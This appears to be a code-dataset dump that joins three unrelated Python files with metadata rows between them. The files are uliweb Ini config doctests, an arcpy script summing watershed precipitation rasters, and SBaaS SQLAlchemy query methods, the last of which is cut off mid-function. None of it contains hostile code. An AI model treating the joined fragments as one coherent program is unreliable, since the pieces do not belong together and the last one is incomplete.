>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor, lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... option = 'abc'
... [other]
... option = default.option
... option1 = '{{option}} xxx'
... option2 = '{{default.option}}'
... option3 = '{{other.option}}'
... \"\"\")
>>> x.read(buf)
>>> buf1 = StringIO(\"\"\"
... [default]
... option = 'hello'
... \"\"\")
>>> x.read(buf1)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
option = 'hello'
[other]
option = 'hello'
option1 = 'hello xxx'
option2 = 'hello'
option3 = 'hello'
<BLANKLINE>
"""
def test_chinese():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> x = Ini(env={'_':_}, convertors=i18n_ini_convertor)
>>> buf = StringIO(\"\"\"#coding=utf-8
... [default]
... option = '中文'
... option1 = u'中文'
... option2 = _('中文')
... option3 = '{{option}}'
... [other]
... x = '中文 {{default.option}}'
... x1 = u'中文 {{default.option}}'
... x2 = u'xbd {{default.option}}'
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=utf-8
[default]
option = '\xe4\xb8\xad\xe6\x96\x87'
option1 = u'\xe4\xb8\xad\xe6\x96\x87'
option2 = _('\xe4\xb8\xad\xe6\x96\x87')
option3 = '\xe4\xb8\xad\xe6\x96\x87'
[other]
x = '\xe4\xb8\xad\xe6\x96\x87 \xe4\xb8\xad\xe6\x96\x87'
x1 = u'\xe4\xb8\xad\xe6\x96\x87 \xe4\xb8\xad\xe6\x96\x87'
x2 = u'xbd \xe4\xb8\xad\xe6\x96\x87'
<BLANKLINE>
>>> print repr(x.other.x1)
u'\u4e2d\u6587 \u4e2d\u6587'
>>> x.keys()
['set', '_', 'gettext_lazy', 'default', 'other']
"""
def test_set():
"""
>>> from StringIO import StringIO
>>> x = Ini()
>>> buf = StringIO(\"\"\"#coding=utf-8
... [default]
... set1 = {1,2,3}
... set2 = set([1,2,3])
... \"\"\")
>>> x.read(buf)
>>> print x
#coding=utf-8
[default]
set1 = set([1, 2, 3])
set2 = set([1, 2, 3])
<BLANKLINE>
>>> buf2 = StringIO(\"\"\"#coding=utf-8
... [default]
... set1 = {5,3}
... \"\"\")
>>> x.read(buf2)
>>> print x.default.set1
set([1, 2, 3, 5])
"""
def test_triple_string():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... a = 'b'
... \"\"\")
>>> x = Ini(raw=True)
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print x.DEFAULT
<BLANKLINE>
#coding=utf8
test.ini :0003 [DEFAULT]
test.ini :0004 a = 'b'
<BLANKLINE>
"""
def test_var_in_section():
"""
>>> from StringIO import StringIO
>>> buf = StringIO(\"\"\"
... #coding=utf8
... [DEFAULT]
... MENUS2012 = [
... ('about', _('关于大会'), '/2012/about'),
... ('schedulebj', _('北京日程'), '/2012/schedulebj'),
... ('schedulesh', _('上海日程'), '/2012/schedulesh'),
... ('Hackathon', _('编程马拉松'), 'http://www.douban.com/event/17299206/'),
... ('registration', _('报名'), '/2012/registration'),
... ('volunteer', _('志愿'), '/2012/volunteer'),
... ('sponsors', _('赞助'), '/2012/sponsors'),
... ('Weibo', _('微博'), 'http://weibo.com/pyconcn'),
... ('2011', _('2011'), '/2011'),
... ]
... a = [1,2,3]
... b <= MENUS2012
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print x.DEFAULT.b[0][0]
about
"""
def test_env_var_1():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['TEST'] = 'test'
>>> os.environ['OK'] = '3'
>>> x = Ini(lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... b = $OK
... d = {'name_$TEST':'$OK'}
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print repr(x.default.a)
'test/ok'
>>> print repr(x.default.b)
3
>>> print repr(x.default.c)
'testok'
>>> print repr(x.default.d)
{'name_test': '3'}
>>> x = Ini()
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... b = $OK
... \"\"\")
>>> x = Ini()
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> print repr(x.default.a)
'test/ok'
>>> print repr(x.default.b)
3
>>> print repr(x.default.c)
'testok'
"""
def test_env_var_2():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['TEST'] = 'test'
>>> os.environ['OK'] = '3'
>>> x = Ini(lazy=True)
>>> buf = StringIO(\"\"\"
... [default]
... a = '$TEST/ok'
... c = '${TEST}ok'
... \"\"\")
>>> x = Ini(import_env=False)
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[default]
a = '$TEST/ok'
c = '${TEST}ok'
<BLANKLINE>
"""
def test_email():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> os.environ['MAIL'] = 'test'
>>> x = Ini(import_env=True, lazy=True)
>>> buf = StringIO(\"\"\"
... [MAIL]
... host = '128.192.168.2'
... \"\"\")
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[MAIL]
host = '128.192.168.2'
<BLANKLINE>
"""
def test_pre_var():
"""
>>> from uliweb.i18n import gettext_lazy as _, i18n_ini_convertor
>>> from StringIO import StringIO
>>> import os
>>> x = Ini(import_env=True, lazy=True, pre_variables={'appname':'test'})
>>> buf = StringIO(\"\"\"
... [DEFAULT]
... model = '#{appname}.models.Model'
... \"\"\")
>>> x.set_filename('test.ini')
>>> x.read(buf)
>>> x.freeze()
>>> print x
#coding=UTF-8
<BLANKLINE>
[DEFAULT]
model = 'test.models.Model'
<BLANKLINE>
"""
def test_dict_init():
"""
>>> x = Ini({'default':{'abc':'name'}})
>>> print x
#coding=utf-8
[default]
abc = 'name'
<BLANKLINE>
"""
| bsd-2-clause | 8,745,944,110,796,426,000 | 22.260365 | 93 | 0.45872 | false | 2.955954 | true | false | false |
NMTHydro/Recharge | zobs/orecharge/Gauges/HF_precip_one.py | 1 | 5870 | import datetime
from dateutil import rrule
import arcpy, os
from arcpy import env
import numpy as np
# Set workspace to GIS gauge data location, loop through individual watersheds
arcpy.env.workspace = "C:\\Recharge_GIS\\nm_gauges.gdb"
fc = "nm_wtrs_11DEC15"
field = "USGS_Code"
cursor = arcpy.SearchCursor(fc)
# List csv gauge data, create list of gauge codes
folder = 'C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_Data_HF_csv'
os.chdir(folder)
csvList = os.listdir(folder)
# make sure that this is getting the right string from the file name
files = [int(name[:8]) for name in csvList]
# Create layer from polygon feature class so it is selectable by attribute
arcpy.env.workspace = "C:\\Recharge_GIS\\nm_gauges.gdb"
arcpy.MakeFeatureLayer_management("C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15", "wtr_layer")
# Loop through polygon features in watersheds layer, select polygon geometry by attribute
for row in cursor:
gPoly = row.getValue(field)
polyStr = str(gPoly)
print gPoly
gstr = arcpy.AddFieldDelimiters("C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15", field)
sqlExp = gstr + " = " + polyStr
print sqlExp
geo = arcpy.SelectLayerByAttribute_management("wtr_layer", "NEW_SELECTION", sqlExp)
# Get csv data from gauges and identify time interval of needed precip data
if int(polyStr) in files:
print "true"
folder = 'C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_Data_HF_csv'
os.chdir(folder)
pos = files.index(int(gPoly))
recs = []
fid = open(csvList[pos])
lines = fid.readlines()[0:]
fid.close()
rows = [line.split(',') for line in lines]
for line in rows:
recs.append([datetime.datetime.strptime(line[2], '%m/%d/%Y %H:%M'), # date
float(line[6])]) # discharge
print "Data points: " + str(len(recs))
qRecs = np.array(recs)
# Make start and end dates correspond with available PRISM data (i.e., 1984-01-01 to 2013-12-31)
start = qRecs[0, 0]
beginPrecip = datetime.datetime(1984, 1, 1)
if start < beginPrecip:
start = beginPrecip
print "Data start: " + str(start)
end = qRecs[len(qRecs)-1, 0]
endPrecip = datetime.datetime(2013, 12, 31)
if end > endPrecip:
end = endPrecip
print "Data end: " + str(end)
# Loop through raster data, clipping and creating arrays of data: Date Q Ppt
rasSq = 1013.02**2/1000 # ppt [mm -> m] and cellsize (x*y) [m*m]
precip = []
date = []
q = []
for day in rrule.rrule(rrule.DAILY, dtstart=start, until=end):
folder = "C:\\Recharge_GIS\\Precip\\800m\\Daily\\"
yr = day.year
if yr <= 1991:
arcpy.env.overwriteOutput = True # Ensure overwrite capability
arcpy.env.workspace = folder + str(day.year) + "a"
ras = folder + str(day.year) + "a\\" + "PRISM_NM_" + str(day.year) + day.strftime('%m') + day.strftime('%d') + ".tif"
if arcpy.Exists(ras):
try:
arcpy.CheckOutExtension("Spatial")
mask = "C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15"
rasPart = arcpy.sa.ExtractByMask(ras, geo)
if day == beginPrecip:
rasPart.save(folder + str(day.year) + "a\\" + str(gPoly) + "_rasterClipTest.tif")
arr = arcpy.RasterToNumPyArray(rasPart, nodata_to_value=0)
arrVal = np.multiply(arr, rasSq)
arrSum = arrVal.sum()
print "Sum of precip on " + str(day) + ": " + str(arrSum)
precip.append(arrSum)
date.append(day)
except:
pass
if yr > 1991:
arcpy.env.workspace = folder + str(day.year)
ras = folder + str(day.year) + "\\" + "PRISM_NMHW2Buff_" + str(day.year) + day.strftime('%m') + day.strftime('%d') + ".tif"
if arcpy.Exists(ras):
try:
arcpy.CheckOutExtension("Spatial")
mask = "C:\\Recharge_GIS\\nm_gauges.gdb\\nm_wtrs_11DEC15"
rasPart = arcpy.sa.ExtractByMask(ras, geo)
if day == beginPrecip:
rasPart.save(folder + str(day.year) + str(gPoly) + "_rasterClipTest.tif")
arr = arcpy.RasterToNumPyArray(rasPart, nodata_to_value=0)
arrVal = np.multiply(arr, rasSq)
arrSum = arrVal.sum()
print "Sum of precip on " + str(day) + ": " + str(arrSum)
precip.append(arrSum)
date.append(day)
except:
pass
ppt = np.array(precip, dtype=float)
date = [rec.strftime('%Y/%m/%d') for rec in date]
add_precip = []
for rec in qRecs[:, 0]:
dday = rec.strftime('%Y/%m/%d')
try:
if rec.hour == 17 and rec.minute == 00:
pos = date.index(dday)
ppt_apnd = ppt[pos]
add_precip.append(ppt_apnd)
else:
add_precip.append(0.0)
except:
pass
ppt_arr = np.array(add_precip, dtype=float)
data = np.column_stack((qRecs[:, 0], qRecs[:, 1], ppt_arr))
# print data
np.savetxt(('C:\\Users\David\\Documents\\Recharge\\Gauges\\Gauge_ppt_HF_csv\\' + str(gPoly) + "_date_q_ppt.csv"),
data, fmt=['%s', '%1.3f', '%1.3f'], delimiter=',')
print "You have been saved!"
| apache-2.0 | 2,281,321,173,935,287,000 | 39.482759 | 139 | 0.53356 | false | 3.48368 | false | false | false |
dmccloskey/SBaaS_quantification | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | 1 | 30898 | #lims
from SBaaS_LIMS.lims_experiment_postgresql_models import *
from SBaaS_LIMS.lims_sample_postgresql_models import *
from .stage01_quantification_physiologicalRatios_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_physiologicalRatios_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_quantification_physiologicalRatios_averages':data_stage01_quantification_physiologicalRatios_averages,
'data_stage01_quantification_physiologicalRatios_replicates':data_stage01_quantification_physiologicalRatios_replicates,
};
self.set_supportedTables(tables_supported);
# Query sample names from data_stage01_quantification_physiologicalRatios_replicates
def get_sampleNameAbbreviations_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,exp_type_I=4):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(sample_description.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
sample_description.sample_name_abbreviation).order_by(
sample_description.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameShort_experimentIDAndSampleNameAbbreviationAndRatioIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,physiologicalratio_id_I,time_point_I,exp_type_I=4):
'''Querry sample names that are used from the experiment by sample name abbreviation and sample description'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).order_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.asc()).all();
sample_names_short_O = [];
for sn in sample_names: sample_names_short_O.append(sn.sample_name_short);
return sample_names_short_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_replicates
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,exp_type_I=4):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
sample_description.sample_name_short.like(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short),
sample_description.time_point.like(data_stage01_quantification_physiologicalRatios_replicates.time_point),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndRatioID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,physiologicalratio_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_replicates
def get_ratio_experimentIDAndSampleNameShortAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I, physiologicalratio_id_I):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
ratio_O = data[0][0];
else:
ratio_O = None;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def get_ratios_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).all();
ratios_O = [];
for d in data:
ratios_O.append(d[0]);
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameShortAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
# Query ratio_id information from data_stage01_quantificaton_physiologicalRatios_replicates
def get_ratioIDs_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,time_point_I):
'''Query physiologicalRatio_ids that are used from the experiment by time_point'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_ratioIDs_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Query physiologicalRatio_ids that are used from the experiment'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_averages
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_averages.time_point).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.time_point).order_by(
data_stage01_quantification_physiologicalRatios_averages.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query sample names from data_stage01_quantification_physiologicalRatios_averages
def get_sampleNameAbbreviations_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndTimePointAndRatioID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I,physiologicalratio_id_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_averages:
def get_data_experimentIDAndTimePointAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = [];
for d in data:
data_1 = {'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value_ave':d.physiologicalratio_value_ave,
'physiologicalratio_value_cv':d.physiologicalratio_value_cv,
'physiologicalratio_value_lb':d.physiologicalratio_value_lb,
'physiologicalratio_value_ub':d.physiologicalratio_value_ub,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_};
data_O.append(data_1);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_data_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = {};
if data:
data_O = {'experiment_id':data[0].experiment_id,
'sample_name_abbreviation':data[0].sample_name_abbreviation,
'time_point':data[0].time_point,
'physiologicalratio_id':data[0].physiologicalratio_id,
'physiologicalratio_name':data[0].physiologicalratio_name,
'physiologicalratio_value_ave':data[0].physiologicalratio_value_ave,
'physiologicalratio_value_cv':data[0].physiologicalratio_value_cv,
'physiologicalratio_value_lb':data[0].physiologicalratio_value_lb,
'physiologicalratio_value_ub':data[0].physiologicalratio_value_ub,
'physiologicalratio_description':data[0].physiologicalratio_description,
'used_':data[0].used_,
'comment_':data[0].comment_};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_ratio_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
ratio_O = None;
if data:
ratio_O = data[0].physiologicalratio_value_ave;
return ratio_O;
